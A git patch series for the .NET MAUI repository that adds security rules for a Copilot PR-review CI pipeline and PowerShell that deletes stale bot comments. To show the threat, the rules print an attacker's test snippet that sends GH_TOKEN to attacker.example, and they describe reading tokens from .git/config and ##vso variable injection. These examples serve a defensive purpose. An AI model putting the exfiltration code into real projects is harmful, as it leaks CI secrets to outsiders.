**only** the tokens that exact task needs. + +```yaml +# ✅ correct — Task 3 (CopilotReview) gets ONLY the copilot token +- bash: | + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... + env: + COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) + # NO GH_TOKEN here — Copilot can't post comments or push +``` + +```yaml +# ❌ wrong — leaks the comment token into the Copilot agent's env +- bash: | + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... + env: + COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) + GH_TOKEN: $(GH_COMMENT_TOKEN) +``` + +When invoking the Copilot CLI, also pass `--secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN` so the CLI redacts them from its own argv/log output. + +## Rule 2 — `persistCredentials: false` on every `checkout: self` + +AzDO's default `checkout: self` writes the service-connection PAT to `.git/config` as: + +``` +[http "https://github.com/"] + extraheader = AUTHORIZATION: bearer +``` + +Any subprocess on the runner — including PR-controlled code — can `cat .git/config` and exfiltrate it. **Always** add `persistCredentials: false` unless the task itself needs to push. + +```yaml +# ✅ correct +- checkout: self + persistCredentials: false + fetchDepth: 1 +``` + +```yaml +# ❌ wrong — service-connection PAT persists in .git/config for the rest of the job +- checkout: self + fetchDepth: 1 +``` + +This applies to **every** job/stage in this pipeline (the PR-review job, the deep-UI-tests job, the post-comment job, etc.), not just the one that runs the agent. + +## Rule 3 — Copy trusted scripts BEFORE the PR is merged, then make them read-only + +The Setup task does `checkout: self` of `main` (no PR merge yet) and copies known-good scripts/skills/configs to a trusted directory. Subsequent tasks must invoke those scripts **from the trusted copy**, never from the merged worktree. + +```bash +# ✅ correct — in Setup task, BEFORE any `git merge` of PR code +TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" +mkdir -p "$TRUSTED" +cp -r .github/scripts "$TRUSTED/scripts" +cp -r .github/skills "$TRUSTED/skills" +cp -r eng/scripts "$TRUSTED/eng-scripts" +chmod -R a-w "$TRUSTED" # ← prevents PR code from rewriting trusted scripts at runtime +``` + +When adding a new pipeline step that invokes a `.ps1`/`.sh`/`.py` script from the repo, follow the convention in `Review-PR.ps1`: + +```powershell +# ✅ correct — resolve via the trusted dir +$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } +$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } +$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } + +& "$SkillsDir/foo/scripts/foo.ps1" ... +``` + +```powershell +# ❌ wrong — runs the PR's version of the script, with all of Gate's tokens in env +$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1" +& $detectScript -PRNumber $PRNumber +``` + +**If you add a new script** that needs to be invoked after PR merge, you must also add it to the Setup-task copy block and reference it via the corresponding `$*Dir` variable. + +## Rule 4 — Strip tokens from env before invoking PR-controlled code + +Even when the *calling* script is trusted, the *subprocess* may be PR-controlled. `dotnet build`/`dotnet test`/`dotnet run` execute the PR's MSBuild graph (`Directory.Build.targets`, `.csproj` `` blocks, source generators, analyzers, then the test/app code). Any of those can read `Environment.GetEnvironmentVariable("GH_TOKEN")` or `$(GH_TOKEN)` MSBuild property and exfiltrate via: + +```xml + + + + +``` + +```csharp +// attacker's test code +[ModuleInitializer] +public static void Leak() => HttpClient.GetAsync("attacker.example/?t=" + + Environment.GetEnvironmentVariable("GH_TOKEN")); +``` + +The same applies to invocations of `BuildAndRunHostApp.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` — all of these *internally* run `dotnet build`/`dotnet test` against PR code. + +Use the `Invoke-WithoutGhTokens` helper in `Review-PR.ps1` (or add an equivalent if writing a new orchestration script): + +```powershell +# ✅ correct — token stripped for the subprocess only, restored after +$testOutput = Invoke-WithoutGhTokens { + dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 +} +``` + +```powershell +# ❌ wrong — Gate has GH_TOKEN in env; the PR-modified .csproj inherits it +$testOutput = dotnet test $resolvedProj --filter $t.Filter ... +``` + +**Trusted metadata-fetch scripts** (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) call `gh` CLI and **need** `GH_TOKEN`. Don't wrap them. The split is: *trusted script reading PR metadata via `gh`* → keeps `GH_TOKEN`; *trusted script invoking PR-controlled code* → wraps in `Invoke-WithoutGhTokens`. + +## Rule 5 — Cross-phase signal files live outside the working tree + +The merged worktree is writable by any PR-controlled process. Anything the next phase trusts (gate verdict, sentinel files, category lists, phase-complete markers) must be written to `$(Agent.TempDirectory)` (or `$TRUSTED`), **never** to a path inside `$RepoRoot`. + +```powershell +# ✅ correct — Agent.TempDirectory is per-job, outside the worktree, not writable by PR code +$gateVerdictDir = if ($env:AGENT_TEMPDIRECTORY) { $env:AGENT_TEMPDIRECTORY } else { Join-Path $RepoRoot "CustomAgentLogsTmp/..." } +"PASS" | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") +``` + +```powershell +# ❌ wrong — a malicious test in the PR can overwrite gate-result.txt with "PASS" +"PASS" | Set-Content (Join-Path $RepoRoot "CustomAgentLogsTmp/.../gate-result.txt") +``` + +The corresponding sentinel-read in a later phase MUST live at the same trusted location and MUST NOT silently fall back to the worktree path if missing. + +## Rule 6 — Strip `##vso[...]` from PR-controlled output + +`##vso[task.setvariable variable=X]value` lines in stdout are interpreted by the AzDO agent as commands to set pipeline variables. PR-controlled code (test output, build output) must have those stripped before the agent sees them, otherwise the PR can promote attacker-controlled values into pipeline variables read by subsequent tasks. + +```bash +# ✅ correct — strip CR (Windows line endings would slip past a simpler regex), then drop vso commands +"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g' +``` + +```bash +# ❌ wrong — bare sed won't match if PR output has CRLF line endings +"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | sed 's/##vso\[.*\]//g' +``` + +## Rule 7 — `gh-aw` workflows: pin version, regenerate `.lock.yml`, restore trusted `.github/` + +For files under `.github/workflows/shared/` and any `gh-aw` `.md` workflow: + +- **Pin the gh-aw compiler version.** Versions ≥ v0.68.4 strip required permissions (`pull-requests: write`) — see `gh-aw#28767`. Pin to a known-good version in the workflow frontmatter. +- **Regenerate the `.lock.yml`** with `gh aw compile` **in the same commit** as any `.md` frontmatter change. A stale lock file causes every dispatch to fail with `ERR_CONFIG: Lock file ... is outdated!`. +- **`workflow_dispatch` triggers must restore trusted `.github/` from main** (use `.github/scripts/Checkout-GhAwPr.ps1` pattern) so that a malicious PR can't supply its own workflow logic via `workflow_dispatch`. + +## Rule 8 — Don't pass tokens through pipeline variables that subsequent tasks read + +```yaml +# ❌ wrong — once written to AzDO variable store, the value is visible to every later task +- bash: echo "##vso[task.setvariable variable=MyToken;issecret=true]$(GH_TOKEN)" +``` + +Tokens come from variable groups linked at the pipeline level. Don't republish them. Don't write them to files in the worktree. Don't `echo` them — even with `issecret=true`, this widens the blast radius. + +--- + +## Code-review checklist for this surface + +When reviewing or authoring a change to any file matched by this instruction's `applyTo`, walk this list: + +- [ ] Every new/modified AzDO `checkout: self` has `persistCredentials: false` (unless the task pushes, in which case add a comment explaining why). +- [ ] Every new/modified `env:` block on a task contains **only** the tokens that task needs. The Copilot-agent task never has `GH_TOKEN`. +- [ ] Every new script invoked from the pipeline after PR merge is resolved via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (or the calling script's equivalent), not `$RepoRoot/...`. +- [ ] If a new script was added to `.github/scripts/`, `.github/skills/`, or `eng/scripts/` that needs to run post-merge, it's covered by the trusted-copy block in `ci-copilot.yml` Setup task. +- [ ] Every new invocation of `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRunHostApp.ps1`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1`, or any other process that executes PR-controlled code is wrapped in `Invoke-WithoutGhTokens { ... }`. +- [ ] Every cross-phase signal file (verdict, sentinel, intermediate state) is written to `$(Agent.TempDirectory)` / `$TRUSTED`, never to `$RepoRoot/...`. +- [ ] Any new pipeline output that includes stdout from PR-controlled code is filtered with `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. +- [ ] If a `.github/workflows/*.md` (gh-aw) was edited, the corresponding `.lock.yml` was regenerated with `gh aw compile` in the same commit. +- [ ] Token names are never written to log lines, even with `Write-Host`/`echo`. Token *values* are never written to files in the worktree. + +## Anti-patterns to grep for during review + +```bash +# Token leak to PR-controlled subprocess +git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts/ .github/skills/ | grep -v Invoke-WithoutGhTokens + +# Script invoked from PR worktree instead of trusted copy +git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts/ .github/skills/ + +# Missing persistCredentials +git grep -nA1 'checkout: self' eng/pipelines/ci-copilot.yml | grep -v persistCredentials + +# Cross-phase state in worktree +git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts/ .github/skills/ + +# Bare ##vso strip without CR handling +git grep -nE "sed.*##vso" eng/pipelines/ci-copilot.yml | grep -v "tr -d" +``` + +--- + +## References + +- **PR #35324** — refactor that introduced the 4-task split and surfaced these issues +- **MauiBot 2026-05-24 review** of PR #35324 — flagged Rules 3 and 4 violations +- **PR #35376** — earlier change that re-introduced missing `persistCredentials: false` on cross-stage checkouts +- **`Review-PR.ps1`** — canonical implementation of `$ScriptsDir`/`$SkillsDir`/`$EngScriptsDir` resolution and `Invoke-WithoutGhTokens` helper +- **`ci-copilot.yml` Setup task** — canonical trusted-copy + `chmod -R a-w` pattern From 07565bb94df0b6dd33c6a3c29ceaefc21b6251e2 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Tue, 26 May 2026 11:23:28 +0200 Subject: [PATCH 09/34] Clean up stale MauiBot PR comments Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 38 +++- .github/scripts/post-ai-summary-comment.ps1 | 115 +++++------ .../shared/Remove-StaleMauiBotComments.ps1 | 185 ++++++++++++++++++ eng/pipelines/ci-copilot.yml | 13 +- 4 files changed, 279 insertions(+), 72 deletions(-) create mode 100644 .github/scripts/shared/Remove-StaleMauiBotComments.ps1 diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 607c06079198..432fdc2219e4 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -112,6 +112,11 @@ $ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts $SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } $EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } +$commentCleanupScript = Join-Path $ScriptsDir "shared/Remove-StaleMauiBotComments.ps1" +if (Test-Path $commentCleanupScript) { + . $commentCleanupScript +} + # Gate has GH_TOKEN in env so trusted code (Detect-TestsInDiff, Find-RegressionRisks, # detect-ui-test-categories) can fetch PR metadata via `gh` CLI. Any subprocess that # executes PR-controlled code (MSBuild targets, test code, source generators, host-app @@ -307,6 +312,13 @@ if ($DryRun) { } else { Write-Host " ⚠️ No changes to merge (PR may already be up to date)" -ForegroundColor Yellow } + + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeMergeConflict ` + -Reason "resolved merge-conflict notice" + } } else { Write-Host " ❌ Squash-merge had conflicts." -ForegroundColor Red git merge --abort 2>$null @@ -317,8 +329,18 @@ if ($DryRun) { git branch -D $reviewBranch 2>$null git branch -D $tempBranch 2>$null + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeMergeConflict ` + -Reason "stale merge-conflict notice" + } + # Post a comment on the PR about merge conflicts - $conflictBody = "⚠️ **Merge Conflict Detected** — This PR has merge conflicts with its target branch. Please rebase onto the target branch and resolve the conflicts." + $conflictBody = @" + +⚠️ **Merge Conflict Detected** — This PR has merge conflicts with its target branch. Please rebase onto the target branch and resolve the conflicts. +"@ try { gh pr comment $PRNumber --body $conflictBody 2>&1 | Out-Null Write-Host " 📝 Posted merge conflict comment on PR" -ForegroundColor Cyan @@ -2165,6 +2187,19 @@ if (Test-Path $winnerFile) { $isPRWinner = (-not $winner) -or ($winner.isPRFix -eq $true) +if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeTryFix ` + -Reason "stale try-fix notice" +} + +if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) { + Dismiss-StaleMauiBotTryFixReviews ` + -PRNumber $PRNumber ` + -Reason "stale try-fix review" +} + if ($isPRWinner) { # Post inline review comments (file:line findings from expert-reviewer agent) $inlineScript = Join-Path $summaryScriptsDir "post-inline-review.ps1" @@ -2223,6 +2258,7 @@ if ($isPRWinner) { $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." } $reviewBody = @" + 🤖 **Automated review — alternative fix proposed** The expert-reviewer evaluation compared the PR fix against $($winner.winner -replace 'try-fix-','#') automatically generated candidates and selected ``$($winner.winner)`` as the strongest fix. diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 5e375790fe02..26d25a082058 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -1,12 +1,14 @@ #!/usr/bin/env pwsh <# .SYNOPSIS - Posts or updates the AI review summary comment on a GitHub Pull Request. + Posts the AI review summary comment on a GitHub Pull Request. .DESCRIPTION Maintains ONE comment per PR, identified by marker. + Before posting a fresh comment, any older generated AI Summary comments are + removed. Existing session blocks are preserved in the newly posted comment. Each review run adds an expandable session keyed by HEAD commit SHA. - - Same commit SHA → replaces that session in-place. + - Same commit SHA → replaces that session in the newly posted comment. - New commit SHA → prepends a new session (latest first). Older sessions stay collapsed; the newest is expanded by default. @@ -22,7 +24,7 @@ (gate-only update) and once after the review phases finish (full update). Any standalone legacy "" comment from older versions of - the script is deleted after a successful post to avoid duplicates. + the script is deleted before the fresh comment is posted to avoid duplicates. .PARAMETER PRNumber The pull request number (required) @@ -48,6 +50,11 @@ param( $ErrorActionPreference = "Stop" $MARKER = "" +$commentCleanupScript = Join-Path $PSScriptRoot "shared/Remove-StaleMauiBotComments.ps1" +if (Test-Path $commentCleanupScript) { + . $commentCleanupScript +} + # ============================================================================ # LOAD PHASE CONTENT # ============================================================================ @@ -244,42 +251,47 @@ function Merge-Sessions { # ============================================================================ Write-Host "Checking for existing review comment..." -ForegroundColor Yellow -$existingCommentId = $null $existingBody = $null +$existingCommentIds = @() $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null -$existingObj = $null if ($existingRaw) { try { $allComments = $existingRaw | ConvertFrom-Json - $existingObj = @($allComments | Where-Object { $_.body -and $_.body.Contains($MARKER) }) | Select-Object -Last 1 + $existingObjs = @($allComments | Where-Object { $_.body -and $_.body.Contains($MARKER) }) + if ($existingObjs.Count -gt 0) { + $existingCommentIds = @($existingObjs | ForEach-Object { $_.id }) + $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body }) + $existingBody = $existingBodies -join "`n`n---`n`n" + Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green + } } catch { Write-Host "⚠️ Could not parse comments: $_" -ForegroundColor Yellow } } -if ($existingObj -and $existingObj.id) { - $existingCommentId = $existingObj.id - $existingBody = $existingObj.body - Write-Host "✓ Found existing comment (ID: $existingCommentId)" -ForegroundColor Green -} - $authorPing = "" if ($prAuthor) { $authorPing = "> 👋 @$prAuthor — new AI review results are available. Please review the latest session below." } +$finalizeSection = "" +$finalizePattern = '(?s)(.*?)' +if ($existingBodies -and $existingBodies.Count -gt 0) { + for ($i = $existingBodies.Count - 1; $i -ge 0; $i--) { + if ($existingBodies[$i] -match $finalizePattern) { + $finalizeSection = "`n`n" + $Matches[1] + break + } + } +} + if ($existingBody) { - # Merge new session into existing body + # Merge new session into all existing AI Summary bodies before deleting the + # old comments. This keeps prior session history even if retries created + # multiple generated comments. $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7 - # Preserve any PR-FINALIZE section that may already exist - $finalizeSection = "" - $finalizePattern = '(?s)(.*?)' - if ($existingBody -match $finalizePattern) { - $finalizeSection = "`n`n" + $Matches[1] - } - $commentBody = @" $MARKER @@ -319,56 +331,35 @@ if ($DryRun) { } # ============================================================================ -# POST OR UPDATE COMMENT +# DELETE STALE GENERATED COMMENTS, THEN POST COMMENT # ============================================================================ $tempFile = [System.IO.Path]::GetTempFileName() try { @{ body = $commentBody } | ConvertTo-Json -Depth 10 | Set-Content -Path $tempFile -Encoding UTF8 - if ($existingCommentId) { - Write-Host "Updating comment (ID: $existingCommentId)..." -ForegroundColor Yellow - try { - gh api --method PATCH "repos/dotnet/maui/issues/comments/$existingCommentId" --input $tempFile 2>&1 | Out-Null - if ($LASTEXITCODE -ne 0) { throw "PATCH failed" } - Write-Host "✅ Review comment updated" -ForegroundColor Green - Write-Output "COMMENT_ID=$existingCommentId" - } catch { - Write-Host "⚠️ Could not update comment $existingCommentId : $_" -ForegroundColor Yellow - $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile - $newId = ($newJson | ConvertFrom-Json).id - Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green - Write-Output "COMMENT_ID=$newId" - } - } else { - Write-Host "Creating new review comment..." -ForegroundColor Yellow - $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile - $newId = ($newJson | ConvertFrom-Json).id - Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green - Write-Output "COMMENT_ID=$newId" + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeAISummary ` + -IncludeLegacyGate ` + -IncludeMergeConflict ` + -IncludeTryFix ` + -Reason "stale generated PR review comment" } -} finally { - Remove-Item $tempFile -ErrorAction SilentlyContinue -} -# ============================================================================ -# CLEAN UP LEGACY STANDALONE GATE COMMENTS -# ============================================================================ -# Earlier versions of this workflow posted gate results in a separate comment -# marked with . Now that the gate is included as a section in -# this unified comment, those legacy comments are duplicates and should go. + if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) { + Dismiss-StaleMauiBotTryFixReviews -PRNumber $PRNumber + } -try { - $legacyMarker = "" - $allRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null - if ($allRaw) { - $allComments = $allRaw | ConvertFrom-Json - $legacy = @($allComments | Where-Object { $_.body -and $_.body.Contains($legacyMarker) }) - foreach ($lc in $legacy) { - Write-Host "🧹 Deleting legacy gate comment (ID: $($lc.id))..." -ForegroundColor Gray - gh api --method DELETE "repos/dotnet/maui/issues/comments/$($lc.id)" 2>&1 | Out-Null - } + Write-Host "Creating new review comment..." -ForegroundColor Yellow + $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile + if ($LASTEXITCODE -ne 0) { + throw "Failed to post AI Summary comment" } -} catch { - Write-Host "⚠️ Legacy gate-comment cleanup failed (non-fatal): $_" -ForegroundColor Yellow + $newId = ($newJson | ConvertFrom-Json).id + Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green + Write-Output "COMMENT_ID=$newId" +} finally { + Remove-Item $tempFile -ErrorAction SilentlyContinue } diff --git a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 new file mode 100644 index 000000000000..850801483647 --- /dev/null +++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 @@ -0,0 +1,185 @@ +#!/usr/bin/env pwsh + +$script:MauiBotCommentAuthors = @( + 'MauiBot', + 'maui-bot', + 'maui-bot[bot]', + 'github-actions[bot]' +) + +$script:AiSummaryCommentMarker = '' +$script:AiGateCommentMarker = '' +$script:MergeConflictCommentMarker = '' +$script:TryFixCommentMarker = '' + +function Test-IsMauiBotCommentAuthor { + param([object]$Comment) + + $login = [string]$Comment.user.login + if ([string]::IsNullOrWhiteSpace($login)) { + return $false + } + + return @($script:MauiBotCommentAuthors | Where-Object { $_ -ieq $login }).Count -gt 0 +} + +function Test-IsMergeConflictCommentBody { + param([string]$Body) + + if ([string]::IsNullOrWhiteSpace($Body)) { + return $false + } + + return $Body.Contains($script:MergeConflictCommentMarker) -or + ($Body.Contains('**Merge Conflict Detected**') -and $Body.Contains('This PR has merge conflicts with its target branch.')) +} + +function Test-IsTryFixCommentBody { + param([string]$Body) + + if ([string]::IsNullOrWhiteSpace($Body)) { + return $false + } + + return $Body.Contains($script:TryFixCommentMarker) -or + ($Body.Contains('Automated review') -and $Body.Contains('alternative fix proposed')) -or + ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff')) +} + +function Get-GitHubIssueComments { + param([Parameter(Mandatory = $true)][int]$PRNumber) + + $raw = gh api "repos/dotnet/maui/issues/$PRNumber/comments?per_page=100" --paginate 2>$null + if ($LASTEXITCODE -ne 0 -or [string]::IsNullOrWhiteSpace($raw)) { + return @() + } + + try { + return @($raw | ConvertFrom-Json) + } catch { + Write-Host " Warning: could not parse PR comments for cleanup: $_" -ForegroundColor Yellow + return @() + } +} + +function Remove-StaleMauiBotIssueComments { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [switch]$IncludeAISummary, + [switch]$IncludeLegacyGate, + [switch]$IncludeMergeConflict, + [switch]$IncludeTryFix, + + [string]$Reason = 'stale MauiBot comment', + [switch]$DryRun + ) + + $comments = Get-GitHubIssueComments -PRNumber $PRNumber + if (-not $comments -or $comments.Count -eq 0) { + return + } + + $staleComments = @() + foreach ($comment in $comments) { + $body = [string]$comment.body + if ([string]::IsNullOrWhiteSpace($body)) { + continue + } + + $matchesGeneratedMarker = + ($IncludeAISummary -and $body.Contains($script:AiSummaryCommentMarker)) -or + ($IncludeLegacyGate -and $body.Contains($script:AiGateCommentMarker)) + + $matchesBotOnlyContent = + (Test-IsMauiBotCommentAuthor $comment) -and ( + ($IncludeMergeConflict -and (Test-IsMergeConflictCommentBody $body)) -or + ($IncludeTryFix -and (Test-IsTryFixCommentBody $body)) + ) + + if ($matchesGeneratedMarker -or $matchesBotOnlyContent) { + $staleComments += $comment + } + } + + foreach ($comment in $staleComments) { + if ($DryRun) { + Write-Host " [DryRun] Would delete $Reason (comment ID: $($comment.id))" -ForegroundColor Magenta + continue + } + + try { + Write-Host " Deleting $Reason (comment ID: $($comment.id))..." -ForegroundColor Gray + $deleteOutput = gh api --method DELETE "repos/dotnet/maui/issues/comments/$($comment.id)" 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "DELETE failed (exit code $LASTEXITCODE): $deleteOutput" + } + } catch { + Write-Host " Warning: could not delete $Reason comment $($comment.id): $_" -ForegroundColor Yellow + } + } +} + +function Get-GitHubPullRequestReviews { + param([Parameter(Mandatory = $true)][int]$PRNumber) + + $raw = gh api "repos/dotnet/maui/pulls/$PRNumber/reviews?per_page=100" --paginate 2>$null + if ($LASTEXITCODE -ne 0 -or [string]::IsNullOrWhiteSpace($raw)) { + return @() + } + + try { + return @($raw | ConvertFrom-Json) + } catch { + Write-Host " Warning: could not parse PR reviews for cleanup: $_" -ForegroundColor Yellow + return @() + } +} + +function Dismiss-StaleMauiBotTryFixReviews { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [string]$Reason = 'superseded MauiBot try-fix review', + [switch]$DryRun + ) + + $reviews = Get-GitHubPullRequestReviews -PRNumber $PRNumber + if (-not $reviews -or $reviews.Count -eq 0) { + return + } + + $staleReviews = @($reviews | Where-Object { + (Test-IsMauiBotCommentAuthor $_) -and + ([string]$_.state -ieq 'CHANGES_REQUESTED') -and + (Test-IsTryFixCommentBody ([string]$_.body)) + }) + + foreach ($review in $staleReviews) { + if ($DryRun) { + Write-Host " [DryRun] Would dismiss $Reason (review ID: $($review.id))" -ForegroundColor Magenta + continue + } + + $tmp = New-TemporaryFile + try { + @{ message = 'Superseded by a newer MauiBot review run.' } | + ConvertTo-Json -Compress | + Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline + + Write-Host " Dismissing $Reason (review ID: $($review.id))..." -ForegroundColor Gray + $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($review.id)/dismissals" --input $tmp.FullName 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput" + } + } catch { + Write-Host " Warning: could not dismiss $Reason review $($review.id): $_" -ForegroundColor Yellow + } finally { + Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + } + } +} diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 91240747f5a2..8a571ef15eb2 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -1511,15 +1511,10 @@ stages: } # end if ($byCat.Count -gt 0) if ($isDeferred) { - # ── DEFERRED MODE: Post full comment with deep results included ── - # Guard against duplicate comments on pipeline retry: check if - # an AI Summary comment already exists for this PR. - $existingComment = gh api "repos/dotnet/maui/issues/$prNumber/comments?per_page=100" --paginate --jq '.[] | select(.body | contains("")) | .id' 2>$null | Select-Object -Last 1 - if ($existingComment) { - Write-Host "Existing AI Summary comment found ($existingComment) — will PATCH instead of creating new" - $commentId = $existingComment - $isDeferred = $false - } + # Keep deferred mode even if a prior AI Summary exists. The + # posting script preserves existing sessions, deletes stale + # generated comments, then posts a fresh unified comment. + Write-Host "Deferred AI Summary posting will clean up any stale generated comments before posting" } if ($isDeferred) { From d3bcebda69c0649a7a2e6e7fb06489855f699c33 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 11:40:10 +0200 Subject: [PATCH 10/34] [CI] Compact ci-copilot security instructions Trim 242 -> ~60 lines: drop redundant good/bad code pairs (the rule itself is the lesson), drop threat-model table (merged into intro), drop references section. Same 8 rules, same applyTo scope, same review checklist + grep anti-patterns. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...-copilot-pipeline-security.instructions.md | 250 +++--------------- 1 file changed, 30 insertions(+), 220 deletions(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index c4bcfaa82252..d98cf17fab22 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -1,242 +1,52 @@ --- -description: "Security rules for the Copilot PR-review pipeline: token scoping, trusted-script copy, PR-controlled code isolation, AzDO/git credential handling." -applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/Review-PR.ps1, .github/scripts/Review-PR.Tests.ps1, .github/scripts/BuildAndRunHostApp.ps1, .github/scripts/BuildAndRunSandbox.ps1, .github/scripts/Find-RegressionRisks.ps1, .github/scripts/Post-CodeReview.ps1, .github/scripts/post-inline-review.ps1, .github/scripts/post-ai-summary-comment.ps1, .github/scripts/post-pr-finalize-comment.ps1, .github/scripts/shared/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" +description: "Security rules for the Copilot PR-review pipeline. Read before editing." +applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" --- -# CI Copilot Pipeline — Security Rules +# CI Copilot pipeline — security rules -This pipeline runs **untrusted PR code** (anything contributed in `dotnet/maui` PRs, including PRs from forks) on AzDO hosted agents **with privileged tokens in scope**: +This pipeline runs **untrusted PR code** on AzDO agents with these tokens in scope: -| Token | Identity | Scope | -|-------|----------|-------| -| `GH_COMMENT_TOKEN` (a.k.a. `GH_TOKEN`) | `maui-bot` PAT | comment / label / review on every PR in the repo | -| `COPILOT_GITHUB_TOKEN` | Copilot app install token | enables the GitHub Copilot CLI | -| AzDO GitHub service-connection PAT (`dnceng-maui`) | GitHub App install token owned by DncEng | repo contents, PRs, issues, checks, workflows | +- `GH_COMMENT_TOKEN` / `GH_TOKEN` — `maui-bot` 